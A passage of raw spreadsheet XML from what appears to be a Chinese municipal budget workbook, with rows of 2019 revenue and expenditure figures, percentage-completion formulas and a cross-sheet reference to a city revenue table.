        <v>178</v>
      </c>
    </row>
    <row r="115" ht="14.25">
      <c r="B115" s="246" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="116" ht="14.25">
      <c r="B116" s="246" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="117" ht="14.25">
      <c r="B117" s="246" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="118" ht="14.25">
      <c r="B118" s="246" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="119" ht="14.25">
      <c r="B119" s="246" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="120" ht="14.25">
      <c r="B120" s="246" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="121" ht="14.25">
      <c r="B121" s="246" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="122" ht="14.25">
      <c r="B122" s="246" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="123" ht="14.25">
      <c r="B123" s="246" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="124" ht="14.25">
      <c r="B124" s="246" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="125" ht="14.25">
      <c r="B125" s="246" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="126" ht="14.25">
      <c r="B126" s="246" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="127" ht="14.25">
      <c r="B127" s="246" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="128" ht="14.25">
      <c r="B128" s="246" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="129" ht="14.25">
      <c r="B129" s="246" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="130" ht="14.25">
      <c r="B130" s="246" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="131" ht="14.25">
      <c r="B131" s="246" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="132" ht="14.25">
      <c r="B132" s="246" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="133" ht="14.25">
      <c r="B133" s="246" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="134" ht="14.25">
      <c r="B134" s="246" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="135" ht="14.25">
      <c r="B135" s="246" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="136" ht="14.25">
      <c r="B136" s="246" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="137" ht="14.25">
      <c r="B137" s="246" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="138" ht="14.25">
      <c r="B138" s="246" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="139" ht="14.25">
      <c r="B139" s="246" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="140" ht="14.25">
      <c r="B140" s="246" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="141" ht="14.25">
      <c r="B141" s="246" t="s">
        <v>205</v>
      </c>
    </row>
    <row r="142" ht="14.25">
      <c r="B142" s="246" t="s">
        <v>206</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>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N30"/>
  <sheetViews>
    <sheetView showGridLines="0" showZeros="0" workbookViewId="0" topLeftCell="A1">
      <pane xSplit="1" ySplit="4" topLeftCell="B5" activePane="bottomRight" state="frozen"/>
      <selection pane="bottomRight" activeCell="D33" sqref="D33"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="54.00390625" style="203" customWidth="1"/>
    <col min="2" max="3" width="10.125" style="204" customWidth="1"/>
    <col min="4" max="4" width="10.875" style="204" customWidth="1"/>
    <col min="5" max="5" width="12.00390625" style="204" customWidth="1"/>
    <col min="6" max="6" width="10.25390625" style="205" hidden="1" customWidth="1"/>
    <col min="7" max="7" width="31.00390625" style="204" customWidth="1"/>
    <col min="8" max="16384" width="9.00390625" style="204" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="36" customHeight="1">
      <c r="A1" s="206" t="s">
        <v>347</v>
      </c>
      <c r="B1" s="206"/>
      <c r="C1" s="206"/>
      <c r="D1" s="206"/>
      <c r="E1" s="206"/>
      <c r="F1" s="206"/>
      <c r="G1" s="206"/>
    </row>
    <row r="2" spans="1:7" ht="18" customHeight="1">
      <c r="A2" s="207" t="s">
        <v>348</v>
      </c>
      <c r="B2" s="208"/>
      <c r="C2" s="208"/>
      <c r="D2" s="208"/>
      <c r="E2" s="208"/>
      <c r="F2" s="209"/>
      <c r="G2" s="210" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="3" spans="1:7" s="201" customFormat="1" ht="42" customHeight="1">
      <c r="A3" s="211" t="s">
        <v>298</v>
      </c>
      <c r="B3" s="212" t="s">
        <v>349</v>
      </c>
      <c r="C3" s="212" t="s">
        <v>300</v>
      </c>
      <c r="D3" s="212" t="s">
        <v>301</v>
      </c>
      <c r="E3" s="212" t="s">
        <v>350</v>
      </c>
      <c r="F3" s="213" t="s">
        <v>303</v>
      </c>
      <c r="G3" s="214" t="s">
        <v>266</v>
      </c>
    </row>
    <row r="4" spans="1:7" ht="24.75" customHeight="1">
      <c r="A4" s="215" t="s">
        <v>304</v>
      </c>
      <c r="B4" s="216">
        <f>SUM(B5:B25)</f>
        <v>746621</v>
      </c>
      <c r="C4" s="216">
        <f>SUM(C5:C25)</f>
        <v>685563</v>
      </c>
      <c r="D4" s="217">
        <f>C4/B4*100</f>
        <v>91.82208911884344</v>
      </c>
      <c r="E4" s="217">
        <f>C4/F4*100</f>
        <v>112.02412505024691</v>
      </c>
      <c r="F4" s="218">
        <v>611978</v>
      </c>
      <c r="G4" s="219"/>
    </row>
    <row r="5" spans="1:7" ht="24.75" customHeight="1">
      <c r="A5" s="108" t="s">
        <v>305</v>
      </c>
      <c r="B5" s="216">
        <v>58564</v>
      </c>
      <c r="C5" s="220">
        <v>57753</v>
      </c>
      <c r="D5" s="217">
        <f aca="true" t="shared" si="0" ref="D5:D19">C5/B5*100</f>
        <v>98.61519021924732</v>
      </c>
      <c r="E5" s="217">
        <f aca="true" t="shared" si="1" ref="E5:E19">C5/F5*100</f>
        <v>104.5700628293107</v>
      </c>
      <c r="F5" s="221">
        <v>55229</v>
      </c>
      <c r="G5" s="222"/>
    </row>
    <row r="6" spans="1:7" ht="24.75" customHeight="1">
      <c r="A6" s="108" t="s">
        <v>306</v>
      </c>
      <c r="B6" s="216"/>
      <c r="C6" s="220"/>
      <c r="D6" s="217"/>
      <c r="E6" s="217"/>
      <c r="F6" s="221"/>
      <c r="G6" s="151"/>
    </row>
    <row r="7" spans="1:7" ht="24.75" customHeight="1">
      <c r="A7" s="108" t="s">
        <v>307</v>
      </c>
      <c r="B7" s="216">
        <v>21732</v>
      </c>
      <c r="C7" s="220">
        <v>21732</v>
      </c>
      <c r="D7" s="217">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="E7" s="217">
        <f t="shared" si="1"/>
        <v>95.9089103667417</v>
      </c>
      <c r="F7" s="221">
        <v>22659</v>
      </c>
      <c r="G7" s="223"/>
    </row>
    <row r="8" spans="1:7" ht="24.75" customHeight="1">
      <c r="A8" s="108" t="s">
        <v>308</v>
      </c>
      <c r="B8" s="216">
        <v>69474</v>
      </c>
      <c r="C8" s="220">
        <v>63309</v>
      </c>
      <c r="D8" s="217">
        <f t="shared" si="0"/>
        <v>91.12617669919683</v>
      </c>
      <c r="E8" s="217">
        <f t="shared" si="1"/>
        <v>98.9203125</v>
      </c>
      <c r="F8" s="221">
        <v>64000</v>
      </c>
      <c r="G8" s="224"/>
    </row>
    <row r="9" spans="1:7" ht="24.75" customHeight="1">
      <c r="A9" s="108" t="s">
        <v>309</v>
      </c>
      <c r="B9" s="216">
        <v>1298</v>
      </c>
      <c r="C9" s="220">
        <v>1298</v>
      </c>
      <c r="D9" s="217">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="E9" s="217">
        <f t="shared" si="1"/>
        <v>59.2964824120603</v>
      </c>
      <c r="F9" s="221">
        <v>2189</v>
      </c>
      <c r="G9" s="20"/>
    </row>
    <row r="10" spans="1:7" ht="24.75" customHeight="1">
      <c r="A10" s="108" t="s">
        <v>310</v>
      </c>
      <c r="B10" s="220">
        <v>17151</v>
      </c>
      <c r="C10" s="220">
        <v>16993</v>
      </c>
      <c r="D10" s="217">
        <f t="shared" si="0"/>
        <v>99.07877091714768</v>
      </c>
      <c r="E10" s="217">
        <f t="shared" si="1"/>
        <v>88.74092641913415</v>
      </c>
      <c r="F10" s="221">
        <v>19149</v>
      </c>
      <c r="G10" s="20"/>
    </row>
    <row r="11" spans="1:7" ht="24.75" customHeight="1">
      <c r="A11" s="108" t="s">
        <v>311</v>
      </c>
      <c r="B11" s="216">
        <v>56273</v>
      </c>
      <c r="C11" s="216">
        <v>52226</v>
      </c>
      <c r="D11" s="217">
        <f t="shared" si="0"/>
        <v>92.80827395020704</v>
      </c>
      <c r="E11" s="217">
        <f t="shared" si="1"/>
        <v>151.15626175798096</v>
      </c>
      <c r="F11" s="218">
        <v>34551</v>
      </c>
      <c r="G11" s="225"/>
    </row>
    <row r="12" spans="1:7" ht="28.5" customHeight="1">
      <c r="A12" s="108" t="s">
        <v>312</v>
      </c>
      <c r="B12" s="216">
        <v>214389</v>
      </c>
      <c r="C12" s="220">
        <v>214389</v>
      </c>
      <c r="D12" s="217">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="E12" s="217">
        <f t="shared" si="1"/>
        <v>110.05651979732956</v>
      </c>
      <c r="F12" s="221">
        <v>194799</v>
      </c>
      <c r="G12" s="226"/>
    </row>
    <row r="13" spans="1:7" s="159" customFormat="1" ht="24.75" customHeight="1">
      <c r="A13" s="227" t="s">
        <v>313</v>
      </c>
      <c r="B13" s="228">
        <v>42548</v>
      </c>
      <c r="C13" s="229">
        <v>38728</v>
      </c>
      <c r="D13" s="230">
        <f t="shared" si="0"/>
        <v>91.02190467237003</v>
      </c>
      <c r="E13" s="230">
        <f t="shared" si="1"/>
        <v>458.26529404804165</v>
      </c>
      <c r="F13" s="231">
        <v>8451</v>
      </c>
      <c r="G13" s="232" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="14" spans="1:7" ht="24.75" customHeight="1">
      <c r="A14" s="108" t="s">
        <v>314</v>
      </c>
      <c r="B14" s="216">
        <v>96208</v>
      </c>
      <c r="C14" s="220">
        <v>83399</v>
      </c>
      <c r="D14" s="217">
        <f t="shared" si="0"/>
        <v>86.68613836687177</v>
      </c>
      <c r="E14" s="217">
        <f t="shared" si="1"/>
        <v>111.75595636909388</v>
      </c>
      <c r="F14" s="221">
        <v>74626</v>
      </c>
      <c r="G14" s="20"/>
    </row>
    <row r="15" spans="1:7" ht="24.75" customHeight="1">
      <c r="A15" s="108" t="s">
        <v>315</v>
      </c>
      <c r="B15" s="216">
        <v>33991</v>
      </c>
      <c r="C15" s="216">
        <v>25567</v>
      </c>
      <c r="D15" s="217">
        <f t="shared" si="0"/>
        <v>75.21696919772882</v>
      </c>
      <c r="E15" s="217">
        <f t="shared" si="1"/>
        <v>59.856253219085076</v>
      </c>
      <c r="F15" s="218">
        <v>42714</v>
      </c>
      <c r="G15" s="20"/>
    </row>
    <row r="16" spans="1:7" ht="24.75" customHeight="1">
      <c r="A16" s="108" t="s">
        <v>316</v>
      </c>
      <c r="B16" s="216">
        <v>27062</v>
      </c>
      <c r="C16" s="220">
        <v>25062</v>
      </c>
      <c r="D16" s="217">
        <f t="shared" si="0"/>
        <v>92.6095632251866</v>
      </c>
      <c r="E16" s="217">
        <f t="shared" si="1"/>
        <v>94.45240069344992</v>
      </c>
      <c r="F16" s="221">
        <v>26534</v>
      </c>
      <c r="G16" s="20"/>
    </row>
    <row r="17" spans="1:7" ht="24.75" customHeight="1">
      <c r="A17" s="108" t="s">
        <v>317</v>
      </c>
      <c r="B17" s="216">
        <v>26155</v>
      </c>
      <c r="C17" s="220">
        <v>26155</v>
      </c>
      <c r="D17" s="217">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="E17" s="217">
        <f t="shared" si="1"/>
        <v>351.82943233790695</v>
      </c>
      <c r="F17" s="221">
        <v>7434</v>
      </c>
      <c r="G17" s="20" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="18" spans="1:7" ht="24.75" customHeight="1">
      <c r="A18" s="108" t="s">
        <v>318</v>
      </c>
      <c r="B18" s="216">
        <v>1024</v>
      </c>
      <c r="C18" s="220">
        <v>615</v>
      </c>
      <c r="D18" s="217">
        <f t="shared" si="0"/>
        <v>60.05859375</v>
      </c>
      <c r="E18" s="217">
        <f t="shared" si="1"/>
        <v>11.799693016116654</v>
      </c>
      <c r="F18" s="221">
        <v>5212</v>
      </c>
      <c r="G18" s="20"/>
    </row>
    <row r="19" spans="1:7" ht="24.75" customHeight="1">
      <c r="A19" s="108" t="s">
        <v>319</v>
      </c>
      <c r="B19" s="216">
        <v>700</v>
      </c>
      <c r="C19" s="220">
        <v>700</v>
      </c>
      <c r="D19" s="217">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="E19" s="217">
        <f t="shared" si="1"/>
        <v>147.36842105263156</v>
      </c>
      <c r="F19" s="221">
        <v>475</v>
      </c>
      <c r="G19" s="233"/>
    </row>
    <row r="20" spans="1:7" ht="24.75" customHeight="1">
      <c r="A20" s="156" t="s">
        <v>321</v>
      </c>
      <c r="B20" s="216">
        <v>2669</v>
      </c>
      <c r="C20" s="220">
        <v>2669</v>
      </c>
      <c r="D20" s="217">
        <f aca="true" t="shared" si="2" ref="D20:D28">C20/B20*100</f>
        <v>100</v>
      </c>
      <c r="E20" s="217">
        <f aca="true" t="shared" si="3" ref="E20:E27">C20/F20*100</f>
        <v>25.922688422688424</v>
      </c>
      <c r="F20" s="221">
        <v>10296</v>
      </c>
      <c r="G20" s="20"/>
    </row>
    <row r="21" spans="1:7" ht="29.25" customHeight="1">
      <c r="A21" s="156" t="s">
        <v>322</v>
      </c>
      <c r="B21" s="216">
        <v>22816</v>
      </c>
      <c r="C21" s="220">
        <v>16816</v>
      </c>
      <c r="D21" s="217">
        <f t="shared" si="2"/>
        <v>73.70266479663394</v>
      </c>
      <c r="E21" s="217">
        <f t="shared" si="3"/>
        <v>147.46996404454967</v>
      </c>
      <c r="F21" s="221">
        <v>11403</v>
      </c>
      <c r="G21" s="20"/>
    </row>
    <row r="22" spans="1:7" ht="24.75" customHeight="1">
      <c r="A22" s="156" t="s">
        <v>323</v>
      </c>
      <c r="B22" s="216">
        <v>3800</v>
      </c>
      <c r="C22" s="220">
        <v>3800</v>
      </c>
      <c r="D22" s="217">
        <f t="shared" si="2"/>
        <v>100</v>
      </c>
      <c r="E22" s="217">
        <f t="shared" si="3"/>
        <v>88.35154615205767</v>
      </c>
      <c r="F22" s="221">
        <v>4301</v>
      </c>
      <c r="G22" s="20"/>
    </row>
    <row r="23" spans="1:7" ht="24.75" customHeight="1">
      <c r="A23" s="156" t="s">
        <v>324</v>
      </c>
      <c r="B23" s="216">
        <v>4306</v>
      </c>
      <c r="C23" s="220">
        <v>4306</v>
      </c>
      <c r="D23" s="217">
        <f t="shared" si="2"/>
        <v>100</v>
      </c>
      <c r="E23" s="217"/>
      <c r="F23" s="221"/>
      <c r="G23" s="20"/>
    </row>
    <row r="24" spans="1:7" ht="28.5" customHeight="1">
      <c r="A24" s="156" t="s">
        <v>325</v>
      </c>
      <c r="B24" s="216">
        <f>13857+1005</f>
        <v>14862</v>
      </c>
      <c r="C24" s="220">
        <f>13857+1005</f>
        <v>14862</v>
      </c>
      <c r="D24" s="217">
        <f t="shared" si="2"/>
        <v>100</v>
      </c>
      <c r="E24" s="217">
        <f t="shared" si="3"/>
        <v>155.36274304829604</v>
      </c>
      <c r="F24" s="221">
        <v>9566</v>
      </c>
      <c r="G24" s="234" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="25" spans="1:7" ht="24.75" customHeight="1">
      <c r="A25" s="108" t="s">
        <v>327</v>
      </c>
      <c r="B25" s="235">
        <v>31599</v>
      </c>
      <c r="C25" s="235">
        <v>15184</v>
      </c>
      <c r="D25" s="217">
        <f t="shared" si="2"/>
        <v>48.052153549162945</v>
      </c>
      <c r="E25" s="217">
        <f t="shared" si="3"/>
        <v>82.56661228928766</v>
      </c>
      <c r="F25" s="236">
        <v>18390</v>
      </c>
      <c r="G25" s="224"/>
    </row>
    <row r="26" spans="1:7" ht="24.75" customHeight="1">
      <c r="A26" s="237" t="s">
        <v>328</v>
      </c>
      <c r="B26" s="216">
        <v>236932</v>
      </c>
      <c r="C26" s="220">
        <v>130806</v>
      </c>
      <c r="D26" s="217">
        <f t="shared" si="2"/>
        <v>55.20824540374454</v>
      </c>
      <c r="E26" s="217">
        <f t="shared" si="3"/>
        <v>157.52926441543426</v>
      </c>
      <c r="F26" s="221">
        <v>83036</v>
      </c>
      <c r="G26" s="238"/>
    </row>
    <row r="27" spans="1:14" s="202" customFormat="1" ht="24.75" customHeight="1">
      <c r="A27" s="239" t="s">
        <v>329</v>
      </c>
      <c r="B27" s="193">
        <v>122151</v>
      </c>
      <c r="C27" s="220">
        <v>65972</v>
      </c>
      <c r="D27" s="217">
        <f t="shared" si="2"/>
        <v>54.00856317181194</v>
      </c>
      <c r="E27" s="217">
        <f t="shared" si="3"/>
        <v>123.21772099886068</v>
      </c>
      <c r="F27" s="221">
        <v>53541</v>
      </c>
      <c r="G27" s="238"/>
      <c r="H27" s="240"/>
      <c r="I27" s="240"/>
      <c r="J27" s="240"/>
      <c r="K27" s="240"/>
      <c r="L27" s="240"/>
      <c r="M27" s="240"/>
      <c r="N27" s="240"/>
    </row>
    <row r="28" spans="1:7" ht="27.75" customHeight="1">
      <c r="A28" s="13" t="s">
        <v>330</v>
      </c>
      <c r="B28" s="241">
        <v>7980</v>
      </c>
      <c r="C28" s="241">
        <v>4918</v>
      </c>
      <c r="D28" s="217">
        <f t="shared" si="2"/>
        <v>61.62907268170426</v>
      </c>
      <c r="E28" s="242"/>
      <c r="F28" s="243"/>
      <c r="G28" s="18"/>
    </row>
    <row r="30" ht="12">
      <c r="E30" s="244"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:G1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.51" footer="0.47"/>
  <pageSetup firstPageNumber="7" useFirstPageNumber="1" fitToHeight="2" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet11.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:E31"/>
  <sheetViews>
    <sheetView showGridLines="0" showZeros="0" workbookViewId="0" topLeftCell="A1">
      <pane xSplit="1" ySplit="3" topLeftCell="B4" activePane="bottomRight" state="frozen"/>
      <selection pane="bottomRight" activeCell="A32" sqref="A32"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="40.125" style="6" customWidth="1"/>
    <col min="2" max="2" width="14.75390625" style="6" customWidth="1"/>
    <col min="3" max="3" width="14.125" style="6" customWidth="1"/>
    <col min="4" max="4" width="13.75390625" style="189" customWidth="1"/>
    <col min="5" max="5" width="36.25390625" style="6" customWidth="1"/>
    <col min="6" max="16384" width="9.00390625" style="6" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" ht="30.75" customHeight="1">
      <c r="A1" s="7" t="s">
        <v>351</v>
      </c>
      <c r="B1" s="7"/>
      <c r="C1" s="7"/>
      <c r="D1" s="7"/>
      <c r="E1" s="7"/>
    </row>
    <row r="2" spans="1:5" ht="21" customHeight="1">
      <c r="A2" s="190" t="s">
        <v>352</v>
      </c>
      <c r="B2" s="9"/>
      <c r="C2" s="9"/>
      <c r="D2" s="191"/>
      <c r="E2" s="192" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="3" spans="1:5" s="5" customFormat="1" ht="45" customHeight="1">
      <c r="A3" s="11" t="s">
        <v>260</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>353</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>354</v>
      </c>
      <c r="D3" s="136" t="s">
        <v>355</v>
      </c>
      <c r="E3" s="12" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="4" spans="1:5" ht="20.25" customHeight="1">
      <c r="A4" s="13" t="s">
        <v>267</v>
      </c>
      <c r="B4" s="193">
        <f>'1、2019全市收入完成表'!C4</f>
        <v>866265</v>
      </c>
      <c r="C4" s="193">
        <f>SUM(C5,C22)</f>
        <v>892253</v>
      </c>
      <c r="D4" s="194">
        <f>C4/B4*100</f>
        <v>103.00000577190582</v>
      </c>
      <c r="E4" s="15"/>
    </row>
    <row r="5" spans="1:5" ht="20.25" customHeight="1">
      <c r="A5" s="17" t="s">
        <v>268</v>
      </c>
      <c r="B5" s="193">
        <f>'1、2019全市收入完成表'!C5</f>
        <v>644789</v>
      </c>
      <c r="C5" s="193">
        <f>SUM(C6:C21)</f>
        <v>675312</v>
      </c>
      <c r="D5" s="194">
        <f aca="true" t="shared" si="0" ref="D5:D31">C5/B5*100</f>
        <v>104.73379663734958</v>
      </c>
      <c r="E5" s="18"/>
    </row>
    <row r="6" spans="1:5" ht="20.25" customHeight="1">
      <c r="A6" s="17" t="s">
        <v>269</v>
      </c>
      <c r="B6" s="193">
        <f>'1、2019全市收入完成表'!C6</f>
        <v>291357</v>
      </c>
      <c r="C6" s="195">
        <v>300603</v>
      </c>
      <c r="D6" s="194">
        <f t="shared" si="0"/>
        <v>103.17342641501664</v>
      </c>
      <c r="E6" s="20"/>
    </row>
    <row r="7" spans="1:5" ht="20.25" customHeight="1">
      <c r="A7" s="17" t="s">
        <v>270</v>
      </c>
      <c r="B7" s="193">
        <f>'1、2019全市收入完成表'!C7</f>
        <v>83739</v>
      </c>
      <c r="C7" s="195">
        <v>89729</v>
      </c>
      <c r="D7" s="194">
        <f t="shared" si="0"/>
        <v>107.1531783278998</v>
      </c>
      <c r="E7" s="20"/>
    </row>
    <row r="8" spans="1:5" ht="20.25" customHeight="1">
      <c r="A8" s="17" t="s">
        <v>271</v>
      </c>
      <c r="B8" s="193">
        <f>'1、2019全市收入完成表'!C8</f>
        <v>0</v>
      </c>
      <c r="C8" s="195">
        <v>0</v>
      </c>
      <c r="D8" s="194"/>
      <c r="E8" s="143"/>
    </row>
    <row r="9" spans="1:5" ht="20.25" customHeight="1">
      <c r="A9" s="17" t="s">
        <v>272</v>
      </c>
      <c r="B9" s="193">
        <f>'1、2019全市收入完成表'!C9</f>
        <v>14713</v>
      </c>
      <c r="C9" s="195">
        <v>16809</v>
      </c>
      <c r="D9" s="194">
        <f t="shared" si="0"/>
        <v>114.24590498198872</v>
      </c>
      <c r="E9" s="143"/>
    </row>
    <row r="10" spans="1:5" ht="20.25" customHeight="1">
      <c r="A10" s="17" t="s">
        <v>273</v>
      </c>
      <c r="B10" s="193">
        <f>'1、2019全市收入完成表'!C10</f>
        <v>35610</v>
      </c>
      <c r="C10" s="195">
        <v>36999</v>
      </c>
      <c r="D10" s="194">
        <f t="shared" si="0"/>
        <v>103.90058972198821</v>
      </c>
      <c r="E10" s="151"/>
    </row>
    <row r="11" spans="1:5" ht="20.25" customHeight="1">
      <c r="A11" s="17" t="s">
        <v>274</v>
      </c>
      <c r="B11" s="193">
        <f>'1、2019全市收入完成表'!C11</f>
        <v>40552</v>
      </c>
      <c r="C11" s="195">
        <v>40312</v>
      </c>
      <c r="D11" s="194">
        <f t="shared" si="0"/>
        <v>99.40816729137897</v>
      </c>
      <c r="E11" s="150"/>
    </row>
    <row r="12" spans="1:5" ht="20.25" customHeight="1">
      <c r="A12" s="17" t="s">
        <v>275</v>
      </c>
      <c r="B12" s="193">
        <f>'1、2019全市收入完成表'!C12</f>
        <v>23487</v>
      </c>
      <c r="C12" s="195">
        <v>27268</v>
      </c>
      <c r="D12" s="194">
        <f t="shared" si="0"/>
        <v>116.09826712649551</v>
      </c>
      <c r="E12" s="143"/>
    </row>
    <row r="13" spans="1:5" ht="20.25" customHeight="1">
      <c r="A13" s="17" t="s">
        <v>276</v>
      </c>
      <c r="B13" s="193">
        <f>'1、2019全市收入完成表'!C13</f>
        <v>19061</v>
      </c>
      <c r="C13" s="195">
        <v>20513</v>
      </c>
      <c r="D13" s="194">
        <f t="shared" si="0"/>
        <v>107.61764860185718</v>
      </c>
      <c r="E13" s="150"/>
    </row>
    <row r="14" spans="1:5" ht="20.25" customHeight="1">
      <c r="A14" s="17" t="s">
        <v>277</v>
      </c>
      <c r="B14" s="193">
        <f>'1、2019全市收入完成表'!C14</f>
        <v>22398</v>
      </c>
      <c r="C14" s="195">
        <v>23987</v>
      </c>
      <c r="D14" s="194">
        <f t="shared" si="0"/>
        <v>107.0943834270917</v>
      </c>
      <c r="E14" s="143"/>
    </row>
    <row r="15" spans="1:5" ht="20.25" customHeight="1">
      <c r="A15" s="17" t="s">
        <v>278</v>
      </c>
      <c r="B15" s="193">
        <f>'1、2019全市收入完成表'!C15</f>
        <v>25140</v>
      </c>
      <c r="C15" s="195">
        <v>27936</v>
      </c>
      <c r="D15" s="194">
        <f t="shared" si="0"/>
        <v>111.12171837708831</v>
      </c>
      <c r="E15" s="143"/>
    </row>
    <row r="16" spans="1:5" ht="20.25" customHeight="1">
      <c r="A16" s="17" t="s">
        <v>279</v>
      </c>
      <c r="B16" s="193">
        <f>'1、2019全市收入完成表'!C16</f>
        <v>27596</v>
      </c>
      <c r="C16" s="195">
        <v>29139</v>
      </c>
      <c r="D16" s="194">
        <f t="shared" si="0"/>
        <v>105.59139005652993</v>
      </c>
      <c r="E16" s="143"/>
    </row>
    <row r="17" spans="1:5" ht="20.25" customHeight="1">
      <c r="A17" s="17" t="s">
        <v>280</v>
      </c>
      <c r="B17" s="193">
        <f>'1、2019全市收入完成表'!C17</f>
        <v>9392</v>
      </c>
      <c r="C17" s="195">
        <v>11039</v>
      </c>
      <c r="D17" s="194">
        <f t="shared" si="0"/>
        <v>117.5362010221465</v>
      </c>
      <c r="E17" s="143"/>
    </row>
    <row r="18" spans="1:5" ht="20.25" customHeight="1">
      <c r="A18" s="17" t="s">
        <v>281</v>
      </c>
      <c r="B18" s="193">
        <f>'1、2019全市收入完成表'!C18</f>
        <v>37882</v>
      </c>
      <c r="C18" s="195">
        <v>37742</v>
      </c>
      <c r="D18" s="194">
        <f t="shared" si="0"/>
        <v>99.63043133942242</v>
      </c>
      <c r="E18" s="150"/>
    </row>
    <row r="19" spans="1:5" ht="20.25" customHeight="1">
      <c r="A19" s="17" t="s">
        <v>282</v>
      </c>
      <c r="B19" s="193">
        <f>'1、2019全市收入完成表'!C19</f>
        <v>1020</v>
      </c>
      <c r="C19" s="195">
        <v>975</v>
      </c>
      <c r="D19" s="194">
        <f t="shared" si="0"/>
        <v>95.58823529411765</v>
      </c>
      <c r="E19" s="196"/>
    </row>
    <row r="20" spans="1:5" ht="20.25" customHeight="1">
      <c r="A20" s="17" t="s">
        <v>283</v>
      </c>
      <c r="B20" s="193">
        <f>'1、2019全市收入完成表'!C20</f>
        <v>11900</v>
      </c>
      <c r="C20" s="195">
        <v>11989</v>
      </c>
      <c r="D20" s="194">
        <f t="shared" si="0"/>
        <v>100.74789915966387</v>
      </c>
      <c r="E20" s="150"/>
    </row>
    <row r="21" spans="1:5" ht="20.25" customHeight="1">
      <c r="A21" s="17" t="s">
        <v>284</v>
      </c>
      <c r="B21" s="193">
        <f>'1、2019全市收入完成表'!C21</f>
        <v>942</v>
      </c>
      <c r="C21" s="195">
        <v>272</v>
      </c>
      <c r="D21" s="194">
        <f t="shared" si="0"/>
        <v>28.874734607218684</v>
      </c>
      <c r="E21" s="150"/>
    </row>
    <row r="22" spans="1:5" ht="20.25" customHeight="1">
      <c r="A22" s="17" t="s">
        <v>285</v>
      </c>
      <c r="B22" s="193">
        <f>'1、2019全市收入完成表'!C22</f>
        <v>221476</v>
      </c>
      <c r="C22" s="195">
        <f>SUM(C23:C28)</f>
        <v>216941</v>
      </c>
      <c r="D22" s="194">
        <f t="shared" si="0"/>
        <v>97.95237407213423</v>
      </c>
      <c r="E22" s="150"/>
    </row>
    <row r="23" spans="1:5" ht="20.25" customHeight="1">
      <c r="A23" s="17" t="s">
        <v>286</v>
      </c>
      <c r="B23" s="193">
        <f>'1、2019全市收入完成表'!C23</f>
        <v>52777</v>
      </c>
      <c r="C23" s="195">
        <v>51653</v>
      </c>
      <c r="D23" s="194">
        <f t="shared" si="0"/>
        <v>97.87028440419122</v>
      </c>
      <c r="E23" s="197"/>
    </row>
    <row r="24" spans="1:5" ht="20.25" customHeight="1">
      <c r="A24" s="17" t="s">
        <v>287</v>
      </c>
      <c r="B24" s="193">
        <f>'1、2019全市收入完成表'!C24</f>
        <v>86863</v>
      </c>
      <c r="C24" s="195">
        <v>82582</v>
      </c>
      <c r="D24" s="194">
        <f t="shared" si="0"/>
        <v>95.07154945143502</v>
      </c>
      <c r="E24" s="150"/>
    </row>
    <row r="25" spans="1:5" ht="20.25" customHeight="1">
      <c r="A25" s="17" t="s">
        <v>288</v>
      </c>
      <c r="B25" s="193">
        <f>'1、2019全市收入完成表'!C25</f>
        <v>38830</v>
      </c>
      <c r="C25" s="195">
        <v>42252</v>
      </c>
      <c r="D25" s="194">
        <f t="shared" si="0"/>
        <v>108.81277362863766</v>
      </c>
      <c r="E25" s="150"/>
    </row>
